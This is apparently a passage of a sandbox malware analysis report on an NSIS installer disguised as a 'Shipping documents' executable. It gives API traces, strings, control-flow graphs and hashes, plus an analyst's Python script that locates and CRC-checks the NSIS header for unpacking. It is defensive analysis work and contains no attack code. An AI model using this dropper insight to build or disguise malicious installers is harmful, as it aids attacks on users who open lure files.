                                        • Opcode Fuzzy Hash: 8ddda18a5e03c3094d99475b595a137c5d28125fbada97bd0876376ed00bff5b
                                        • Instruction Fuzzy Hash: 2441B231400A14BADB21BB65DC8DAAF7678EF81714F24813BF801B11D1DB7C4A81DEAE
                                        APIs
                                        • FindFirstFileW.KERNELBASE(?,0042FAB8,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00405F77,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsi1309.tmp,C:\Users\user\AppData\Local\Temp\nsi1309.tmp, 4#v,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,76233420,C:\Users\user\AppData\Local\Temp\), ref: 004068BF
                                        • FindClose.KERNEL32(00000000), ref: 004068CB
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp\nsi1309.tmp, xrefs: 004068B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Find$CloseFileFirst
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsi1309.tmp
                                        • API String ID: 2295610775-3576001853
                                        • Opcode ID: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                        • Instruction ID: 0f602bcf77736d61886636fd33b874369bd8b56ce32760b4adaf045605f9a717
                                        • Opcode Fuzzy Hash: d8a05a579feb8caf00dd3d3e1258ef949bc643ef28fd0ab534c34ddbe61a4aed
                                        • Instruction Fuzzy Hash: 24D012725161309BC2406738AD0C84B7B58AF15331751CA37F56BF21E0D7348C6387A9
                                        APIs
                                        • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040291F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                        • Instruction ID: 4f8030157269cd498ea314d5a86e386b0cfb994e1dea9c94a4400a3869289cfc
                                        • Opcode Fuzzy Hash: ace8a8367a08c0c3b8c33878fd122fec618c7fcc40fbfc74b5a987c147888bf4
                                        • Instruction Fuzzy Hash: 17F08C71A04104AAD701EBE4EE499AEB378EF14324F60457BE102F31E0DBB85E159B2A

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                         [control-flow graph of the function at 00403FD7: rendered graph omitted]
                                        APIs
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404013
                                        • ShowWindow.USER32(?), ref: 00404033
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404045
                                        • ShowWindow.USER32(?,00000004), ref: 0040405E
                                        • DestroyWindow.USER32 ref: 00404072
                                        • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040408B
                                        • GetDlgItem.USER32(?,?), ref: 004040AA
                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004040BE
                                        • IsWindowEnabled.USER32(00000000), ref: 004040C5
                                        • GetDlgItem.USER32(?,00000001), ref: 00404170
                                        • GetDlgItem.USER32(?,00000002), ref: 0040417A
                                        • SetClassLongW.USER32(?,000000F2,?), ref: 00404194
                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004041E5
                                        • GetDlgItem.USER32(?,00000003), ref: 0040428B
                                        • ShowWindow.USER32(00000000,?), ref: 004042AC
                                        • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004042BE
                                        • EnableWindow.USER32(?,?), ref: 004042D9
                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004042EF
                                        • EnableMenuItem.USER32(00000000), ref: 004042F6
                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040430E
                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404321
                                        • lstrlenW.KERNEL32(0042CA68,?,0042CA68,00000000), ref: 0040434B
                                        • SetWindowTextW.USER32(?,0042CA68), ref: 0040435F
                                        • ShowWindow.USER32(?,0000000A), ref: 00404493
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Window$Item$MessageSendShow$Long$EnableMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                        • String ID:
                                        • API String ID: 121052019-0
                                        • Opcode ID: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                        • Instruction ID: 911e0a6aef898d83942fe666095560f38e6effa11f08765efd6836b1f10f2e9c
                                        • Opcode Fuzzy Hash: df8d1fa02ff149c62ea57a685de79d9d3ef227f732b6982a07419eaff96d62a7
                                        • Instruction Fuzzy Hash: 29C1B0B1500204BBDB206F61EE89A2B3A68FB85756F01053EF781B51F0CB3958929B2D

                                        Control-flow Graph

                                        control_flow_graph 439 403c29-403c41 call 40694b 442 403c43-403c53 call 40649e 439->442 443 403c55-403c8c call 406425 439->443 452 403caf-403cd8 call 403eff call 405f2e 442->452 448 403ca4-403caa lstrcatW 443->448 449 403c8e-403c9f call 406425 443->449 448->452 449->448 457 403d6a-403d72 call 405f2e 452->457 458 403cde-403ce3 452->458 464 403d80-403da5 LoadImageW 457->464 465 403d74-403d7b call 406594 457->465 458->457 459 403ce9-403d11 call 406425 458->459 459->457 466 403d13-403d17 459->466 468 403e26-403e2e call 40140b 464->468 469 403da7-403dd7 RegisterClassW 464->469 465->464 470 403d29-403d35 lstrlenW 466->470 471 403d19-403d26 call 405e53 466->471 482 403e30-403e33 468->482 483 403e38-403e43 call 403eff 468->483 472 403ef5 469->472 473 403ddd-403e21 SystemParametersInfoW CreateWindowExW 469->473 477 403d37-403d45 lstrcmpiW 470->477 478 403d5d-403d65 call 405e26 call 406557 470->478 471->470 476 403ef7-403efe 472->476 473->468 477->478 481 403d47-403d51 GetFileAttributesW 477->481 478->457 485 403d53-403d55 481->485 486 403d57-403d58 call 405e72 481->486 482->476 492 403e49-403e63 ShowWindow call 4068db 483->492 493 403ecc-403ecd call 4056af 483->493 485->478 485->486 486->478 498 403e65-403e6a call 4068db 492->498 499 403e6f-403e81 GetClassInfoW 492->499 497 403ed2-403ed4 493->497 500 403ed6-403edc 497->500 501 403eee-403ef0 call 40140b 497->501 498->499 505 403e83-403e93 GetClassInfoW RegisterClassW 499->505 506 403e99-403ebc DialogBoxParamW call 40140b 499->506 500->482 502 403ee2-403ee9 call 40140b 500->502 501->472 502->482 505->506 510 403ec1-403eca call 403b79 506->510 510->476
                                        APIs
                                          • Part of subcall function 0040694B: GetModuleHandleA.KERNEL32(?,00000020,?,00403642,0000000C,?,?,?,?,?,?,?,?), ref: 0040695D
                                          • Part of subcall function 0040694B: GetProcAddress.KERNEL32(00000000,?), ref: 00406978
                                        • lstrcatW.KERNEL32(1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,00000000,"C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe",00008001), ref: 00403CAA
                                        • lstrlenW.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Local\acneform,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,76233420), ref: 00403D2A
                                        • lstrcmpiW.KERNEL32(?,.exe,Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Local\acneform,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
                                        • GetFileAttributesW.KERNEL32(Exec), ref: 00403D48
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\acneform), ref: 00403D91
                                          • Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB
                                        • RegisterClassW.USER32(004336A0), ref: 00403DCE
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E51
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
                                        • GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
                                        • RegisterClassW.USER32(004336A0), ref: 00403E93
                                        • DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\acneform$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                        • API String ID: 1975747703-4230011955
                                        • Opcode ID: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                        • Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
                                        • Opcode Fuzzy Hash: bbb1e3748a54a273649d0fbd54a0890110e87f86c4ca5900aa60a5a95311a30e
                                        • Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

                                        Control-flow Graph

                                        control_flow_graph 513 403082-4030d0 GetTickCount GetModuleFileNameW call 406047 516 4030d2-4030d7 513->516 517 4030dc-40310a call 406557 call 405e72 call 406557 GetFileSize 513->517 518 4032b2-4032b6 516->518 525 403110 517->525 526 4031f5-403203 call 40301e 517->526 527 403115-40312c 525->527 532 403205-403208 526->532 533 403258-40325d 526->533 529 403130-403139 call 4034d4 527->529 530 40312e 527->530 539 40325f-403267 call 40301e 529->539 540 40313f-403146 529->540 530->529 535 40320a-403222 call 4034ea call 4034d4 532->535 536 40322c-403256 GlobalAlloc call 4034ea call 4032b9 532->536 533->518 535->533 559 403224-40322a 535->559 536->533 564 403269-40327a 536->564 539->533 543 4031c2-4031c6 540->543 544 403148-40315c call 406002 540->544 548 4031d0-4031d6 543->548 549 4031c8-4031cf call 40301e 543->549 544->548 562 40315e-403165 544->562 555 4031e5-4031ed 548->555 556 4031d8-4031e2 call 406a38 548->556 549->548 555->527 563 4031f3 555->563 556->555 559->533 559->536 562->548 568 403167-40316e 562->568 563->526 565 403282-403287 564->565 566 40327c 564->566 569 403288-40328e 565->569 566->565 568->548 570 403170-403177 568->570 569->569 571 403290-4032ab SetFilePointer call 406002 569->571 570->548 572 403179-403180 570->572 575 4032b0 571->575 572->548 574 403182-4031a2 572->574 574->533 576 4031a8-4031ac 574->576 575->518 577 4031b4-4031bc 576->577 578 4031ae-4031b2 576->578 577->548 579 4031be-4031c0 577->579 578->563 578->577 579->548
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 00403093
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,00000400), ref: 004030AF
                                          • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 0040604B
                                          • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                        • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe,80000000,00000003), ref: 004030FB
                                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 00403231
                                        Strings
                                        • Null, xrefs: 00403179
                                        • Inst, xrefs: 00403167
                                        • "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe", xrefs: 00403088
                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
                                        • Error launching installer, xrefs: 004030D2
                                        • C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
                                        • soft, xrefs: 00403170
                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
                                        • C:\Users\user\Desktop, xrefs: 004030DD, 004030E2, 004030E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                        • String ID: "C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000022999878999800009999.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                        • API String ID: 2803837635-286970823
                                        • Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                        • Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
                                        • Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
                                        • Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD
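                                        Analyst note on the function above (00403082): this is the NSIS exehead's header loader, not sample-specific code. It opens its own image (GetModuleFileNameW, CreateFileW), takes GetFileSize, scans the file in blocks for the NSIS first-header signature (the "Null", "soft" and "Inst" strings cross-referenced at 00403167, 00403170 and 00403179 are the three 4-byte parts of "NullsoftInst"), GlobalAllocs room for the decompressed header, and verifies a CRC32 over the whole file, failing with the "Installer integrity check has failed" string seen at 00403258. The script below repeats that locate-and-verify step offline so an analyst can find the offset at which to carve the NSIS overlay for further unpacking. It is an added example, not code from this report or from NSIS; the field layout and FH_FLAGS_* values follow NSIS's exehead/fileform.h, and the sample image it builds is constructed for the test (the length_of_header value in it is a placeholder, and the 16 payload bytes stand in for the compressed header and datablock).

```python
"""Locate the NSIS firstheader in an installer image and repeat the exehead's
integrity check: 512-byte block scan for the signature, then CRC32 over the
file except its last 4 bytes (the stored CRC), skipped when FH_FLAGS_NO_CRC
is set.  Added example; layout per NSIS exehead/fileform.h."""
import struct
import zlib

FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"      # nsinst[0..2] = "Null", "soft", "Inst"
FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8
FH_SIZE = 28                    # flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
NSIS_ALIGN = 512                # the stub reads 512-byte blocks until the header turns up


def find_first_header(image: bytes):
    """Offset of the firstheader, or None.  Only 512-aligned hits count, as in
    the exehead; an unaligned copy of the magic (string table, decoy) is skipped."""
    needle = struct.pack("<I", FH_SIG) + FH_MAGIC
    pos = image.find(needle)
    while pos != -1:
        off = pos - 4                       # the 4-byte flags field precedes the signature
        if off >= 0 and off % NSIS_ALIGN == 0:
            return off
        pos = image.find(needle, pos + 1)
    return None


def parse_first_header(image: bytes, off: int) -> dict:
    flags, sig = struct.unpack_from("<II", image, off)
    hdr_len, following = struct.unpack_from("<II", image, off + 20)
    return {"offset": off, "flags": flags, "silent": bool(flags & FH_FLAGS_SILENT),
            "length_of_header": hdr_len, "length_of_all_following_data": following,
            "data_offset": off + FH_SIZE}   # start of the compressed header/datablock


def check_integrity(image: bytes, hdr: dict):
    """(ok, reason).  length_of_all_following_data counts from the firstheader
    to end of file, CRC included; the CRC covers everything before its 4 bytes."""
    end = hdr["offset"] + hdr["length_of_all_following_data"]
    if end > len(image):
        return False, "length_of_all_following_data runs past end of file"
    if hdr["flags"] & FH_FLAGS_NO_CRC:
        return True, "no CRC (FH_FLAGS_NO_CRC set)"
    stored = struct.unpack_from("<I", image, end - 4)[0]
    computed = zlib.crc32(image[:end - 4]) & 0xFFFFFFFF
    if stored != computed:
        return False, "Installer integrity check has failed"   # the stub's own message
    return True, "crc ok"


def analyze(image: bytes):
    off = find_first_header(image)
    if off is None:
        return None
    hdr = parse_first_header(image, off)
    hdr["ok"], hdr["reason"] = check_integrity(image, hdr)
    return hdr


def build_sample(flags: int = 0, decoy: bool = False) -> bytes:
    """Constructed test image (not a real installer): 512-byte dummy stub,
    firstheader, 16 placeholder payload bytes and, unless FH_FLAGS_NO_CRC is
    set, the trailing CRC32.  decoy=True plants an unaligned copy of the
    magic inside the stub to exercise the alignment filter."""
    stub = bytearray(b"MZ" + b"\x00" * (NSIS_ALIGN - 2))
    if decoy:
        stub[64:80] = struct.pack("<I", FH_SIG) + FH_MAGIC
    payload = b"\x00" * 16
    crc_len = 0 if flags & FH_FLAGS_NO_CRC else 4
    following = FH_SIZE + len(payload) + crc_len
    header = (struct.pack("<II", flags, FH_SIG) + FH_MAGIC
              + struct.pack("<II", len(payload), following))
    body = bytes(stub) + header + payload
    if crc_len:
        body += struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)
    return body


if __name__ == "__main__":
    import sys
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample(decoy=True)
    print(analyze(image))
```

                                        Run it against the dropped sample to get the header offset and data_offset; a CRC mismatch here means a truncated or modified file, since the check is the installer's own integrity test and not an anti-analysis measure. A silent flag in the parsed header is worth noting for a sample that claims to be a shipping document, as it hides the NSIS dialog the function at 00403c29 above sets up.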

                                        Control-flow Graph

                                        control_flow_graph 644 406594-40659d 645 4065b0-4065ca 644->645 646 40659f-4065ae 644->646 647 4065d0-4065dc 645->647 648 4067da-4067e0 645->648 646->645 647->648 649 4065e2-4065e9 647->649 650 4067e6-4067f3 648->650 651 4065ee-4065fb 648->651 649->648 653 4067f5-4067fa call 406557 650->653 654 4067ff-406802 650->654 651->650 652 406601-40660a 651->652 655 406610-406653 652->655 656 4067c7 652->656 653->654 660 406659-406665 655->660 661 40676b-40676f 655->661 658 4067d5-4067d8 656->658 659 4067c9-4067d3 656->659 658->648 659->648 662 406667 660->662 663 40666f-406671 660->663 664 406771-406778 661->664 665 4067a3-4067a7 661->665 662->663 668 406673-406691 call 406425 663->668 669 4066ab-4066ae 663->669 666 406788-406794 call 406557 664->666 667 40677a-406786 call 40649e 664->667 670 4067b7-4067c5 lstrlenW 665->670 671 4067a9-4067b2 call 406594 665->671 683 406799-40679f 666->683 667->683 682 406696-406699 668->682 676 4066b0-4066bc GetSystemDirectoryW 669->676 677 4066c1-4066c4 669->677 670->648 671->670 678 40674e-406751 676->678 679 4066d6-4066da 677->679 680 4066c6-4066d2 GetWindowsDirectoryW 677->680 684 406763-406769 call 406805 678->684 685 406753-406756 678->685 679->678 686 4066dc-4066fa 679->686 680->679 682->685 687 40669f-4066a6 call 406594 682->687 683->670 688 4067a1 683->688 684->670 685->684 689 406758-40675e lstrcatW 685->689 691 4066fc-406702 686->691 692 40670e-406726 call 40694b 686->692 687->678 688->684 689->684 697 40670a-40670c 691->697 701 406728-40673b SHGetPathFromIDListW CoTaskMemFree 692->701 702 40673d-406746 692->702 697->692 699 406748-40674c 697->699 699->678 701->699 701->702 702->686 702->699
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(Exec,00000400), ref: 004066B6
                                        • GetWindowsDirectoryW.KERNEL32(Exec,00000400,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,?,?,00000000,00000000,00424620,762323A0), ref: 004066CC
                                        • SHGetPathFromIDListW.SHELL32(00000000,Exec), ref: 0040672A
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,00000007), ref: 00406733
                                        • lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,?,?,00000000,00000000,00424620,762323A0), ref: 0040675E
                                        • lstrlenW.KERNEL32(Exec,00000000,Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll,?,?,00000000,00000000,00424620,762323A0), ref: 004067B8
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                        • String ID: Exec$Extract: C:\Users\user\AppData\Local\Temp\nsi1309.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                        • API String ID: 4024019347-1458689035
                                        • Opcode ID: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                        • Instruction ID: fc62ecdfc612bfadb4c03fc2fb2820e4449372332e166df7cb208319b666a0da
                                        • Opcode Fuzzy Hash: 2066e1c471d7490a15c1c198898eb18b068b97d6eda6cad4e7272ae8e9db0920
                                        • Instruction Fuzzy Hash: 7D612571A046009BD720AF24DD84B6A76E8EF95328F16053FF643B32D0DB7C9961875E

                                        Control-flow Graph

                                        control_flow_graph 703 4032b9-4032d0 704 4032d2 703->704 705 4032d9-4032e2 703->705 704->705 706 4032e4 705->706 707 4032eb-4032f0 705->707 706->707 708 403300-40330d call 4034d4 707->708 709 4032f2-4032fb call 4034ea 707->709 713 4034c2 708->713 714 403313-403317 708->714 709->708 715 4034c4-4034c5 713->715 716 40346d-40346f 714->716 717 40331d-403366 GetTickCount 714->717 720 4034cd-4034d1 715->720 718 403471-403474 716->718 719 4034af-4034b2 716->719 721 4034ca 717->721 722 40336c-403374 717->722 718->721 725 403476 718->725 723 4034b4 719->723 724 4034b7-4034c0 call 4034d4 719->724 721->720 726 403376 722->726 727 403379-403387 call 4034d4 722->727 723->724 724->713 737 4034c7 724->737 730 403479-40347f 725->730 726->727 727->713 736 40338d-403396 727->736 733 403481 730->733 734 403483-403491 call 4034d4 730->734 733->734 734->713 740 403493-40349f call 4060f9 734->740 739 40339c-4033bc call 406aa6 736->739 737->721 745 4033c2-4033d5 GetTickCount 739->745 746 403465-403467 739->746 747 4034a1-4034ab 740->747 748 403469-40346b 740->748 749 403420-403422 745->749 750 4033d7-4033df 745->750 746->715 747->730 751 4034ad 747->751 748->715 754 403424-403428 749->754 755 403459-40345d 749->755 752 4033e1-4033e5 750->752 753 4033e7-403418 MulDiv wsprintfW call 4055dc 750->753 751->721 752->749 752->753 762 40341d 753->762 758 40342a-403431 call 4060f9 754->758 759 40343f-40344a 754->759 755->722 756 403463 755->756 756->721 763 403436-403438 758->763 761 40344d-403451 759->761 761->739 764 403457 761->764 762->749 763->748 765 40343a-40343d 763->765 764->721 765->761
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2152926272.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.2152911275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152940939.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000041E000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2152960150.0000000000461000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2153120361.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_Shipping documents 000022999878999800009999.jbxd
                                        Similarity
                                        • API ID: CountTick$wsprintf
                                        • String ID: *B$ FB$ A$ A$... %d%%
                                        • API String ID: 551687249-3833040932
                                        • Opcode ID: 4d79547acdf73e44e2915cc23a34bb29038fe19ea0f8e502eb24a445e2a4333a
                                        • Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
